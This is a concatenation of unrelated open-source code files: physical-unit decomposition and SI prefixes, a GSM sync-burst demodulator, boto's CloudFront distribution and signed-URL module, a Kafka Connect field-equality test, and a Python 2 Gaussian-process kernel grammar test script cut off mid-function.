# needed for the corner case of mag=-0.4*dex
scale *= cmath.exp(power * cmath.log(unit._to(base)))
unit = base
break
else:
unit = base
break
if unit in new_parts:
a, b = resolve_fractions(new_parts[unit], power)
new_parts[unit] = a + b
else:
new_parts[unit] = power
return scale
new_parts = {}
scale = self.scale
for b, p in zip(self.bases, self.powers):
if decompose and b not in bases:
b = b.decompose(bases=bases)
if isinstance(b, CompositeUnit):
try:
scale *= b._scale ** p
except ValueError:
# on python2, sqrt(negative number) does not
# automatically lead to a complex number, but this is
# needed for the corner case of mag=-0.4*dex
scale *= cmath.exp(p * cmath.log(b._scale))
for b_sub, p_sub in zip(b._bases, b._powers):
a, b = resolve_fractions(p_sub, p)
scale = add_unit(b_sub, a * b, scale)
else:
scale = add_unit(b, p, scale)
new_parts = [x for x in six.iteritems(new_parts) if x[1] != 0]
new_parts.sort(key=lambda x: (-x[1], getattr(x[0], 'name', '')))
self._bases = [x[0] for x in new_parts]
self._powers = [validate_power(x[1]) for x in new_parts]
self._scale = sanitize_scale(scale)
def __copy__(self):
"""
For compatibility with python copy module.
"""
return CompositeUnit(self._scale, self._bases[:], self._powers[:])
def decompose(self, bases=set()):
if len(bases) == 0 and self._decomposed_cache is not None:
return self._decomposed_cache
for base in self.bases:
if (not isinstance(base, IrreducibleUnit) or
(len(bases) and base not in bases)):
break
else:
if len(bases) == 0:
self._decomposed_cache = self
return self
x = CompositeUnit(self.scale, self.bases, self.powers, decompose=True,
decompose_bases=bases)
if len(bases) == 0:
self._decomposed_cache = x
return x
def is_unity(self):
unit = self.decompose()
return len(unit.bases) == 0 and unit.scale == 1.0
si_prefixes = [
(['Y'], ['yotta'], 1e24),
(['Z'], ['zetta'], 1e21),
(['E'], ['exa'], 1e18),
(['P'], ['peta'], 1e15),
(['T'], ['tera'], 1e12),
(['G'], ['giga'], 1e9),
(['M'], ['mega'], 1e6),
(['k'], ['kilo'], 1e3),
(['h'], ['hecto'], 1e2),
(['da'], ['deka', 'deca'], 1e1),
(['d'], ['deci'], 1e-1),
(['c'], ['centi'], 1e-2),
(['m'], ['milli'], 1e-3),
(['u'], ['micro'], 1e-6),
(['n'], ['nano'], 1e-9),
(['p'], ['pico'], 1e-12),
(['f'], ['femto'], 1e-15),
(['a'], ['atto'], 1e-18),
(['z'], ['zepto'], 1e-21),
(['y'], ['yocto'], 1e-24)
]
binary_prefixes = [
(['Ki'], ['kibi'], 2. ** 10),
(['Mi'], ['mebi'], 2. ** 20),
(['Gi'], ['gibi'], 2. ** 30),
(['Ti'], ['tebi'], 2. ** 40),
(['Pi'], ['pebi'], 2. ** 50),
(['Ei'], ['exbi'], 2. ** 60)
]
def _add_prefixes(u, excludes=[], namespace=None, prefixes=False):
"""
Set up all of the standard metric prefixes for a unit. This
function should not be used directly, but instead use the
`prefixes` kwarg on `def_unit`.
Parameters
----------
excludes : list of str, optional
Any prefixes to exclude from creation to avoid namespace
collisions.
namespace : dict, optional
When provided, inject the unit (and all of its aliases) into
the given namespace dictionary.
prefixes : list, optional
When provided, it is a list of prefix definitions of the form:
(short_names, long_tables, factor)
"""
if prefixes is True:
prefixes = si_prefixes
elif prefixes is False:
prefixes = []
for short, full, factor in prefixes:
names = []
format = {}
for prefix in short:
if prefix in excludes:
continue
for alias in u.short_names:
names.append(prefix + alias)
# This is a hack to use Greek mu as a prefix
# for some formatters.
if prefix == 'u':
format['latex'] = r'\mu ' + u.get_format_name('latex')
format['unicode'] = 'μ' + u.get_format_name('unicode')
for key, val in six.iteritems(u._format):
format.setdefault(key, prefix + val)
for prefix in full:
if prefix in excludes:
continue
for alias in u.long_names:
names.append(prefix + alias)
if len(names):
PrefixUnit(names, CompositeUnit(factor, [u], [1],
_error_check=False),
namespace=namespace, format=format)
def def_unit(s, represents=None, doc=None, format=None, prefixes=False,
exclude_prefixes=[], namespace=None):
"""
Factory function for defining new units.
Parameters
----------
s : str or list of str
The name of the unit. If a list, the first element is the
canonical (short) name, and the rest of the elements are
aliases.
represents : UnitBase instance, optional
The unit that this named unit represents. If not provided,
a new `IrreducibleUnit` is created.
doc : str, optional
A docstring describing the unit.
format : dict, optional
A mapping to format-specific representations of this unit.
For example, for the ``Ohm`` unit, it might be nice to
have it displayed as ``\\Omega`` by the ``latex``
formatter. In that case, `format` argument should be set
to::
{'latex': r'\\Omega'}
prefixes : bool or list, optional
When `True`, generate all of the SI prefixed versions of the
unit as well. For example, for a given unit ``m``, will
generate ``mm``, ``cm``, ``km``, etc. When a list, it is a list of
prefix definitions of the form:
(short_names, long_tables, factor)
Default is `False`. This function always returns the base
unit object, even if multiple scaled versions of the unit were
created.
exclude_prefixes : list of str, optional
If any of the SI prefixes need to be excluded, they may be
listed here. For example, ``Pa`` can be interpreted either as
"petaannum" or "Pascal". Therefore, when defining the
prefixes for ``a``, ``exclude_prefixes`` should be set to
``["P"]``.
namespace : dict, optional
When provided, inject the unit (and all of its aliases and
prefixes), into the given namespace dictionary.
Returns
-------
unit : `UnitBase` object
The newly-defined unit, or a matching unit that was already
defined.
"""
if represents is not None:
result = Unit(s, represents, namespace=namespace, doc=doc,
format=format)
else:
result = IrreducibleUnit(
s, namespace=namespace, doc=doc, format=format)
if prefixes:
_add_prefixes(result, excludes=exclude_prefixes, namespace=namespace,
prefixes=prefixes)
return result
def _condition_arg(value):
"""
Validate value is acceptable for conversion purposes.
Will convert into an array if not a scalar, and can be converted
into an array
Parameters
----------
value : int or float value, or sequence of such values
Returns
-------
Scalar value or numpy array
Raises
------
ValueError
If value is not as expected
"""
if isinstance(value, (float, six.integer_types, complex)):
return value
if isinstance(value, np.ndarray) and value.dtype.kind in ['i', 'f', 'c']:
return value
avalue = np.array(value)
if avalue.dtype.kind not in ['i', 'f', 'c']:
raise ValueError("Value not scalar compatible or convertible to "
"an int, float, or complex array")
return avalue
dimensionless_unscaled = CompositeUnit(1, [], [], _error_check=False)
# Abbreviation of the above, see #1980
one = dimensionless_unscaled
# Maintain error in old location for backward compatibility
# TODO: Is this still needed? Should there be a deprecation warning?
unit_format.fits.UnitScaleError = UnitScaleError
|
unknown
|
codeparrot/codeparrot-clean
| ||
from Burst import Burst
import numpy as np
class SB(Burst):
def __init__(self):
self.syncbits = [
0x01, 0x00, 0x01, 0x01, 0x01, 0x00, 0x00, 0x01,
0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x01, 0x01, 0x01,
0x00, 0x00, 0x01, 0x00, 0x01, 0x01, 0x00, 0x01,
0x00, 0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01,
0x00, 0x01, 0x01, 0x01, 0x00, 0x01, 0x01, 0x00,
0x00, 0x00, 0x00, 0x01, 0x01, 0x00, 0x01, 0x01 ]
self.bits = [
1,0,1,1,1,0,0,1,
0,1,1,0,0,0,1,0,
0,0,0,0,0,1,0,0,
0,0,0,0,1,1,1,1,
0,0,1,0,1,1,0,1,
1,0,1,0,0,1,0,1,
0,1,1,1,0,1,1,0,
0,0,0,1,1,0,1,1]
s = np.array(self.syncbits)*2-1
self.sync = []
for x in s:
self.sync += [x,x,x,x]
self.training_seq = self.gmsk_mapper(s,complex(0.,-1.))
def demodu(self,s):
self.dem = self.diff(s)
s = np.zeros(len(self.dem),dtype=complex)
s[:len(self.sync)]=self.sync[:]
fs = np.fft.fft(s)
fd = np.fft.fft(self.dem)
tr = np.abs(np.fft.ifft(fd*np.conj(fs)))
return tr
def channelEst( self, frame, osr ):
return Burst.channelEst( self, frame, self.training_seq, osr )
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2006-2009 Mitch Garnaat http://garnaat.org/
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import uuid
import base64
import time
from boto.compat import six, json
from boto.cloudfront.identity import OriginAccessIdentity
from boto.cloudfront.object import Object, StreamingObject
from boto.cloudfront.signers import ActiveTrustedSigners, TrustedSigners
from boto.cloudfront.logging import LoggingInfo
from boto.cloudfront.origin import S3Origin, CustomOrigin
from boto.s3.acl import ACL
class DistributionConfig(object):
def __init__(self, connection=None, origin=None, enabled=False,
caller_reference='', cnames=None, comment='',
trusted_signers=None, default_root_object=None,
logging=None):
"""
:param origin: Origin information to associate with the
distribution. If your distribution will use
an Amazon S3 origin, then this should be an
S3Origin object. If your distribution will use
a custom origin (non Amazon S3), then this
should be a CustomOrigin object.
:type origin: :class:`boto.cloudfront.origin.S3Origin` or
:class:`boto.cloudfront.origin.CustomOrigin`
:param enabled: Whether the distribution is enabled to accept
end user requests for content.
:type enabled: bool
:param caller_reference: A unique number that ensures the
request can't be replayed. If no
caller_reference is provided, boto
will generate a type 4 UUID for use
as the caller reference.
:type enabled: str
:param cnames: A CNAME alias you want to associate with this
distribution. You can have up to 10 CNAME aliases
per distribution.
:type enabled: array of str
:param comment: Any comments you want to include about the
distribution.
:type comment: str
:param trusted_signers: Specifies any AWS accounts you want to
permit to create signed URLs for private
content. If you want the distribution to
use signed URLs, this should contain a
TrustedSigners object; if you want the
distribution to use basic URLs, leave
this None.
:type trusted_signers: :class`boto.cloudfront.signers.TrustedSigners`
:param default_root_object: Designates a default root object.
Only include a DefaultRootObject value
if you are going to assign a default
root object for the distribution.
:type comment: str
:param logging: Controls whether access logs are written for the
distribution. If you want to turn on access logs,
this should contain a LoggingInfo object; otherwise
it should contain None.
:type logging: :class`boto.cloudfront.logging.LoggingInfo`
"""
self.connection = connection
self.origin = origin
self.enabled = enabled
if caller_reference:
self.caller_reference = caller_reference
else:
self.caller_reference = str(uuid.uuid4())
self.cnames = []
if cnames:
self.cnames = cnames
self.comment = comment
self.trusted_signers = trusted_signers
self.logging = logging
self.default_root_object = default_root_object
def __repr__(self):
return "DistributionConfig:%s" % self.origin
def to_xml(self):
s = '<?xml version="1.0" encoding="UTF-8"?>\n'
s += '<DistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
if self.origin:
s += self.origin.to_xml()
s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
for cname in self.cnames:
s += ' <CNAME>%s</CNAME>\n' % cname
if self.comment:
s += ' <Comment>%s</Comment>\n' % self.comment
s += ' <Enabled>'
if self.enabled:
s += 'true'
else:
s += 'false'
s += '</Enabled>\n'
if self.trusted_signers:
s += '<TrustedSigners>\n'
for signer in self.trusted_signers:
if signer == 'Self':
s += ' <Self></Self>\n'
else:
s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
s += '</TrustedSigners>\n'
if self.logging:
s += '<Logging>\n'
s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
s += '</Logging>\n'
if self.default_root_object:
dro = self.default_root_object
s += '<DefaultRootObject>%s</DefaultRootObject>\n' % dro
s += '</DistributionConfig>\n'
return s
def startElement(self, name, attrs, connection):
if name == 'TrustedSigners':
self.trusted_signers = TrustedSigners()
return self.trusted_signers
elif name == 'Logging':
self.logging = LoggingInfo()
return self.logging
elif name == 'S3Origin':
self.origin = S3Origin()
return self.origin
elif name == 'CustomOrigin':
self.origin = CustomOrigin()
return self.origin
else:
return None
def endElement(self, name, value, connection):
if name == 'CNAME':
self.cnames.append(value)
elif name == 'Comment':
self.comment = value
elif name == 'Enabled':
if value.lower() == 'true':
self.enabled = True
else:
self.enabled = False
elif name == 'CallerReference':
self.caller_reference = value
elif name == 'DefaultRootObject':
self.default_root_object = value
else:
setattr(self, name, value)
class StreamingDistributionConfig(DistributionConfig):
def __init__(self, connection=None, origin='', enabled=False,
caller_reference='', cnames=None, comment='',
trusted_signers=None, logging=None):
super(StreamingDistributionConfig, self).__init__(connection=connection,
origin=origin, enabled=enabled,
caller_reference=caller_reference,
cnames=cnames, comment=comment,
trusted_signers=trusted_signers,
logging=logging)
def to_xml(self):
s = '<?xml version="1.0" encoding="UTF-8"?>\n'
s += '<StreamingDistributionConfig xmlns="http://cloudfront.amazonaws.com/doc/2010-07-15/">\n'
if self.origin:
s += self.origin.to_xml()
s += ' <CallerReference>%s</CallerReference>\n' % self.caller_reference
for cname in self.cnames:
s += ' <CNAME>%s</CNAME>\n' % cname
if self.comment:
s += ' <Comment>%s</Comment>\n' % self.comment
s += ' <Enabled>'
if self.enabled:
s += 'true'
else:
s += 'false'
s += '</Enabled>\n'
if self.trusted_signers:
s += '<TrustedSigners>\n'
for signer in self.trusted_signers:
if signer == 'Self':
s += ' <Self/>\n'
else:
s += ' <AwsAccountNumber>%s</AwsAccountNumber>\n' % signer
s += '</TrustedSigners>\n'
if self.logging:
s += '<Logging>\n'
s += ' <Bucket>%s</Bucket>\n' % self.logging.bucket
s += ' <Prefix>%s</Prefix>\n' % self.logging.prefix
s += '</Logging>\n'
s += '</StreamingDistributionConfig>\n'
return s
class DistributionSummary(object):
def __init__(self, connection=None, domain_name='', id='',
last_modified_time=None, status='', origin=None,
cname='', comment='', enabled=False):
self.connection = connection
self.domain_name = domain_name
self.id = id
self.last_modified_time = last_modified_time
self.status = status
self.origin = origin
self.enabled = enabled
self.cnames = []
if cname:
self.cnames.append(cname)
self.comment = comment
self.trusted_signers = None
self.etag = None
self.streaming = False
def __repr__(self):
return "DistributionSummary:%s" % self.domain_name
def startElement(self, name, attrs, connection):
if name == 'TrustedSigners':
self.trusted_signers = TrustedSigners()
return self.trusted_signers
elif name == 'S3Origin':
self.origin = S3Origin()
return self.origin
elif name == 'CustomOrigin':
self.origin = CustomOrigin()
return self.origin
return None
def endElement(self, name, value, connection):
if name == 'Id':
self.id = value
elif name == 'Status':
self.status = value
elif name == 'LastModifiedTime':
self.last_modified_time = value
elif name == 'DomainName':
self.domain_name = value
elif name == 'Origin':
self.origin = value
elif name == 'CNAME':
self.cnames.append(value)
elif name == 'Comment':
self.comment = value
elif name == 'Enabled':
if value.lower() == 'true':
self.enabled = True
else:
self.enabled = False
elif name == 'StreamingDistributionSummary':
self.streaming = True
else:
setattr(self, name, value)
def get_distribution(self):
return self.connection.get_distribution_info(self.id)
class StreamingDistributionSummary(DistributionSummary):
def get_distribution(self):
return self.connection.get_streaming_distribution_info(self.id)
class Distribution(object):
def __init__(self, connection=None, config=None, domain_name='',
id='', last_modified_time=None, status=''):
self.connection = connection
self.config = config
self.domain_name = domain_name
self.id = id
self.last_modified_time = last_modified_time
self.status = status
self.in_progress_invalidation_batches = 0
self.active_signers = None
self.etag = None
self._bucket = None
self._object_class = Object
def __repr__(self):
return "Distribution:%s" % self.domain_name
def startElement(self, name, attrs, connection):
if name == 'DistributionConfig':
self.config = DistributionConfig()
return self.config
elif name == 'ActiveTrustedSigners':
self.active_signers = ActiveTrustedSigners()
return self.active_signers
else:
return None
def endElement(self, name, value, connection):
if name == 'Id':
self.id = value
elif name == 'LastModifiedTime':
self.last_modified_time = value
elif name == 'Status':
self.status = value
elif name == 'InProgressInvalidationBatches':
self.in_progress_invalidation_batches = int(value)
elif name == 'DomainName':
self.domain_name = value
else:
setattr(self, name, value)
def update(self, enabled=None, cnames=None, comment=None):
"""
Update the configuration of the Distribution. The only values
of the DistributionConfig that can be directly updated are:
* CNAMES
* Comment
* Whether the Distribution is enabled or not
Any changes to the ``trusted_signers`` or ``origin`` properties of
this distribution's current config object will also be included in
the update. Therefore, to set the origin access identity for this
distribution, set ``Distribution.config.origin.origin_access_identity``
before calling this update method.
:type enabled: bool
:param enabled: Whether the Distribution is active or not.
:type cnames: list of str
:param cnames: The DNS CNAME's associated with this
Distribution. Maximum of 10 values.
:type comment: str or unicode
:param comment: The comment associated with the Distribution.
"""
new_config = DistributionConfig(self.connection, self.config.origin,
self.config.enabled, self.config.caller_reference,
self.config.cnames, self.config.comment,
self.config.trusted_signers,
self.config.default_root_object)
if enabled is not None:
new_config.enabled = enabled
if cnames is not None:
new_config.cnames = cnames
if comment is not None:
new_config.comment = comment
self.etag = self.connection.set_distribution_config(self.id, self.etag, new_config)
self.config = new_config
self._object_class = Object
def enable(self):
"""
Activate the Distribution. A convenience wrapper around
the update method.
"""
self.update(enabled=True)
def disable(self):
"""
Deactivate the Distribution. A convenience wrapper around
the update method.
"""
self.update(enabled=False)
def delete(self):
"""
Delete this CloudFront Distribution. The content
associated with the Distribution is not deleted from
the underlying Origin bucket in S3.
"""
self.connection.delete_distribution(self.id, self.etag)
def _get_bucket(self):
if isinstance(self.config.origin, S3Origin):
if not self._bucket:
bucket_dns_name = self.config.origin.dns_name
bucket_name = bucket_dns_name.replace('.s3.amazonaws.com', '')
from boto.s3.connection import S3Connection
s3 = S3Connection(self.connection.aws_access_key_id,
self.connection.aws_secret_access_key,
proxy=self.connection.proxy,
proxy_port=self.connection.proxy_port,
proxy_user=self.connection.proxy_user,
proxy_pass=self.connection.proxy_pass)
self._bucket = s3.get_bucket(bucket_name)
self._bucket.distribution = self
self._bucket.set_key_class(self._object_class)
return self._bucket
else:
raise NotImplementedError('Unable to get_objects on CustomOrigin')
def get_objects(self):
"""
Return a list of all content objects in this distribution.
:rtype: list of :class:`boto.cloudfront.object.Object`
:return: The content objects
"""
bucket = self._get_bucket()
objs = []
for key in bucket:
objs.append(key)
return objs
def set_permissions(self, object, replace=False):
"""
Sets the S3 ACL grants for the given object to the appropriate
value based on the type of Distribution. If the Distribution
is serving private content the ACL will be set to include the
Origin Access Identity associated with the Distribution. If
the Distribution is serving public content the content will
be set up with "public-read".
:type object: :class:`boto.cloudfront.object.Object`
:param enabled: The Object whose ACL is being set
:type replace: bool
:param replace: If False, the Origin Access Identity will be
appended to the existing ACL for the object.
If True, the ACL for the object will be
completely replaced with one that grants
READ permission to the Origin Access Identity.
"""
if isinstance(self.config.origin, S3Origin):
if self.config.origin.origin_access_identity:
id = self.config.origin.origin_access_identity.split('/')[-1]
oai = self.connection.get_origin_access_identity_info(id)
policy = object.get_acl()
if replace:
policy.acl = ACL()
policy.acl.add_user_grant('READ', oai.s3_user_id)
object.set_acl(policy)
else:
object.set_canned_acl('public-read')
def set_permissions_all(self, replace=False):
"""
Sets the S3 ACL grants for all objects in the Distribution
to the appropriate value based on the type of Distribution.
:type replace: bool
:param replace: If False, the Origin Access Identity will be
appended to the existing ACL for the object.
If True, the ACL for the object will be
completely replaced with one that grants
READ permission to the Origin Access Identity.
"""
bucket = self._get_bucket()
for key in bucket:
self.set_permissions(key, replace)
def add_object(self, name, content, headers=None, replace=True):
"""
Adds a new content object to the Distribution. The content
for the object will be copied to a new Key in the S3 Bucket
and the permissions will be set appropriately for the type
of Distribution.
:type name: str or unicode
:param name: The name or key of the new object.
:type content: file-like object
:param content: A file-like object that contains the content
for the new object.
:type headers: dict
:param headers: A dictionary containing additional headers
you would like associated with the new
object in S3.
:rtype: :class:`boto.cloudfront.object.Object`
:return: The newly created object.
"""
if self.config.origin.origin_access_identity:
policy = 'private'
else:
policy = 'public-read'
bucket = self._get_bucket()
object = bucket.new_key(name)
object.set_contents_from_file(content, headers=headers, policy=policy)
if self.config.origin.origin_access_identity:
self.set_permissions(object, replace)
return object
def create_signed_url(self, url, keypair_id,
expire_time=None, valid_after_time=None,
ip_address=None, policy_url=None,
private_key_file=None, private_key_string=None):
"""
Creates a signed CloudFront URL that is only valid within the specified
parameters.
:type url: str
:param url: The URL of the protected object.
:type keypair_id: str
:param keypair_id: The keypair ID of the Amazon KeyPair used to sign
theURL. This ID MUST correspond to the private key
specified with private_key_file or private_key_string.
:type expire_time: int
:param expire_time: The expiry time of the URL. If provided, the URL
will expire after the time has passed. If not provided the URL will
never expire. Format is a unix epoch.
Use int(time.time() + duration_in_sec).
:type valid_after_time: int
:param valid_after_time: If provided, the URL will not be valid until
after valid_after_time. Format is a unix epoch.
Use int(time.time() + secs_until_valid).
:type ip_address: str
:param ip_address: If provided, only allows access from the specified
IP address. Use '192.168.0.10' for a single IP or
use '192.168.0.0/24' CIDR notation for a subnet.
:type policy_url: str
:param policy_url: If provided, allows the signature to contain
wildcard globs in the URL. For example, you could
provide: 'http://example.com/media/\*' and the policy
and signature would allow access to all contents of
the media subdirectory. If not specified, only
allow access to the exact url provided in 'url'.
:type private_key_file: str or file object.
:param private_key_file: If provided, contains the filename of the
private key file used for signing or an open
file object containing the private key
contents. Only one of private_key_file or
private_key_string can be provided.
:type private_key_string: str
:param private_key_string: If provided, contains the private key string
used for signing. Only one of private_key_file or
private_key_string can be provided.
:rtype: str
:return: The signed URL.
"""
# Get the required parameters
params = self._create_signing_params(
url=url, keypair_id=keypair_id, expire_time=expire_time,
valid_after_time=valid_after_time, ip_address=ip_address,
policy_url=policy_url, private_key_file=private_key_file,
private_key_string=private_key_string)
#combine these into a full url
if "?" in url:
sep = "&"
else:
sep = "?"
signed_url_params = []
for key in ["Expires", "Policy", "Signature", "Key-Pair-Id"]:
if key in params:
param = "%s=%s" % (key, params[key])
signed_url_params.append(param)
signed_url = url + sep + "&".join(signed_url_params)
return signed_url
def _create_signing_params(self, url, keypair_id,
expire_time=None, valid_after_time=None,
ip_address=None, policy_url=None,
private_key_file=None, private_key_string=None):
"""
Creates the required URL parameters for a signed URL.
"""
params = {}
# Check if we can use a canned policy
if expire_time and not valid_after_time and not ip_address and not policy_url:
# we manually construct this policy string to ensure formatting
# matches signature
policy = self._canned_policy(url, expire_time)
params["Expires"] = str(expire_time)
else:
# If no policy_url is specified, default to the full url.
if policy_url is None:
policy_url = url
# Can't use canned policy
policy = self._custom_policy(policy_url, expires=expire_time,
valid_after=valid_after_time,
ip_address=ip_address)
encoded_policy = self._url_base64_encode(policy)
params["Policy"] = encoded_policy
#sign the policy
signature = self._sign_string(policy, private_key_file, private_key_string)
#now base64 encode the signature (URL safe as well)
encoded_signature = self._url_base64_encode(signature)
params["Signature"] = encoded_signature
params["Key-Pair-Id"] = keypair_id
return params
@staticmethod
def _canned_policy(resource, expires):
"""
Creates a canned policy string.
"""
policy = ('{"Statement":[{"Resource":"%(resource)s",'
'"Condition":{"DateLessThan":{"AWS:EpochTime":'
'%(expires)s}}}]}' % locals())
return policy
@staticmethod
def _custom_policy(resource, expires=None, valid_after=None, ip_address=None):
"""
Creates a custom policy string based on the supplied parameters.
"""
condition = {}
# SEE: http://docs.amazonwebservices.com/AmazonCloudFront/latest/DeveloperGuide/RestrictingAccessPrivateContent.html#CustomPolicy
# The 'DateLessThan' property is required.
if not expires:
# Defaults to ONE day
expires = int(time.time()) + 86400
condition["DateLessThan"] = {"AWS:EpochTime": expires}
if valid_after:
condition["DateGreaterThan"] = {"AWS:EpochTime": valid_after}
if ip_address:
if '/' not in ip_address:
ip_address += "/32"
condition["IpAddress"] = {"AWS:SourceIp": ip_address}
policy = {"Statement": [{
"Resource": resource,
"Condition": condition}]}
return json.dumps(policy, separators=(",", ":"))
@staticmethod
def _sign_string(message, private_key_file=None, private_key_string=None):
"""
Signs a string for use with Amazon CloudFront.
Requires the rsa library be installed.
"""
try:
import rsa
except ImportError:
raise NotImplementedError("Boto depends on the python rsa "
"library to generate signed URLs for "
"CloudFront")
# Make sure only one of private_key_file and private_key_string is set
if private_key_file and private_key_string:
raise ValueError("Only specify the private_key_file or the private_key_string not both")
if not private_key_file and not private_key_string:
raise ValueError("You must specify one of private_key_file or private_key_string")
# If private_key_file is a file name, open it and read it
if private_key_string is None:
if isinstance(private_key_file, six.string_types):
with open(private_key_file, 'r') as file_handle:
private_key_string = file_handle.read()
# Otherwise, treat it like a file
else:
private_key_string = private_key_file.read()
# Sign it!
private_key = rsa.PrivateKey.load_pkcs1(private_key_string)
signature = rsa.sign(str(message), private_key, 'SHA-1')
return signature
@staticmethod
def _url_base64_encode(msg):
"""
Base64 encodes a string using the URL-safe characters specified by
Amazon.
"""
msg_base64 = base64.b64encode(msg)
msg_base64 = msg_base64.replace('+', '-')
msg_base64 = msg_base64.replace('=', '_')
msg_base64 = msg_base64.replace('/', '~')
return msg_base64
class StreamingDistribution(Distribution):
def __init__(self, connection=None, config=None, domain_name='',
id='', last_modified_time=None, status=''):
super(StreamingDistribution, self).__init__(connection, config,
domain_name, id, last_modified_time, status)
self._object_class = StreamingObject
def startElement(self, name, attrs, connection):
if name == 'StreamingDistributionConfig':
self.config = StreamingDistributionConfig()
return self.config
else:
return super(StreamingDistribution, self).startElement(name, attrs,
connection)
def update(self, enabled=None, cnames=None, comment=None):
"""
Update the configuration of the StreamingDistribution. The only values
of the StreamingDistributionConfig that can be directly updated are:
* CNAMES
* Comment
* Whether the Distribution is enabled or not
Any changes to the ``trusted_signers`` or ``origin`` properties of
this distribution's current config object will also be included in
the update. Therefore, to set the origin access identity for this
distribution, set
``StreamingDistribution.config.origin.origin_access_identity``
before calling this update method.
:type enabled: bool
:param enabled: Whether the StreamingDistribution is active or not.
:type cnames: list of str
:param cnames: The DNS CNAME's associated with this
Distribution. Maximum of 10 values.
:type comment: str or unicode
:param comment: The comment associated with the Distribution.
"""
new_config = StreamingDistributionConfig(self.connection,
self.config.origin,
self.config.enabled,
self.config.caller_reference,
self.config.cnames,
self.config.comment,
self.config.trusted_signers)
if enabled is not None:
new_config.enabled = enabled
if cnames is not None:
new_config.cnames = cnames
if comment is not None:
new_config.comment = comment
self.etag = self.connection.set_streaming_distribution_config(self.id,
self.etag,
new_config)
self.config = new_config
self._object_class = StreamingObject
def delete(self):
self.connection.delete_streaming_distribution(self.id, self.etag)
|
unknown
|
codeparrot/codeparrot-clean
| ||
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.kafka.connect.data;
import org.junit.jupiter.api.Test;
import static org.junit.jupiter.api.Assertions.assertEquals;
import static org.junit.jupiter.api.Assertions.assertNotEquals;
public class FieldTest {
@Test
public void testEquality() {
Field field1 = new Field("name", 0, Schema.INT8_SCHEMA);
Field field2 = new Field("name", 0, Schema.INT8_SCHEMA);
Field differentName = new Field("name2", 0, Schema.INT8_SCHEMA);
Field differentIndex = new Field("name", 1, Schema.INT8_SCHEMA);
Field differentSchema = new Field("name", 0, Schema.INT16_SCHEMA);
assertEquals(field1, field2);
assertNotEquals(field1, differentName);
assertNotEquals(field1, differentIndex);
assertNotEquals(field1, differentSchema);
}
}
|
java
|
github
|
https://github.com/apache/kafka
|
connect/api/src/test/java/org/apache/kafka/connect/data/FieldTest.java
|
'''
Created on Nov 2012
@authors: James Robert Lloyd (jrl44@cam.ac.uk)
David Duvenaud (dkd23@cam.ac.uk)
Roger Grosse (rgrosse@mit.edu)
'''
import flexiblekernel as fk
import grammar
import gpml
import utils.latex
import numpy as np
import pylab
import scipy.io
import sys
import os
from job_controller import *
import flexiblekernel as fk
from flexiblekernel import ScoredKernel
import grammar
import gpml
import utils.latex
import utils.fear
from config import *
from utils import gaussians, psd_matrices
import numpy as np
nax = np.newaxis
import pylab
import scipy.io
import sys
import os
import tempfile
import subprocess
import time
import cblparallel
from cblparallel.util import mkstemp_safe
import re
import shutil
import random
def kernel_test():
k = fk.MaskKernel(4, 3, fk.SqExpKernel(0, 0))
print k.gpml_kernel_expression()
print k.pretty_print()
print '[%s]' % k.param_vector()
print 'kernel_test complete'
def base_kernel_test():
print [k.pretty_print() for k in fk.base_kernels(1)]
print 'base_kernel_test complete'
def expand_test():
k1 = fk.SqExpKernel(1, 1)
k2 = fk.SqExpPeriodicKernel(2, 2, 2)
e = fk.SumKernel([k1, k2])
g = grammar.OneDGrammar()
print ''
for f in grammar.expand(e, g):
#print f
print f.pretty_print()
print grammar.canonical(f).pretty_print()
print
print ' ***** duplicates removed *****'
print
kernels = grammar.expand(e, g)
for f in grammar.remove_duplicates(kernels):
print f.pretty_print()
print
print '%d originally, %d without duplicates' % (len(kernels), len(grammar.remove_duplicates(kernels)))
print 'expand_test complete'
def expand_test2():
k1 = fk.MaskKernel(2, 0, fk.SqExpKernel(1, 1))
k2 = fk.MaskKernel(2, 1, fk.SqExpPeriodicKernel(2, 2, 2))
e = fk.SumKernel([k1, k2])
g = grammar.MultiDGrammar(2)
print ''
for f in grammar.expand(e, g):
print f.pretty_print()
print grammar.canonical(f).pretty_print()
print
print ' ***** duplicates removed *****'
print
kernels = grammar.expand(e, g)
for f in grammar.remove_duplicates(kernels):
print f.pretty_print()
print
print '%d originally, %d without duplicates' % (len(kernels), len(grammar.remove_duplicates(kernels)))
print 'expand_test complete'
def load_mauna():
'''2011 Mauna dataset.'''
data_file = '../data/mauna.mat'
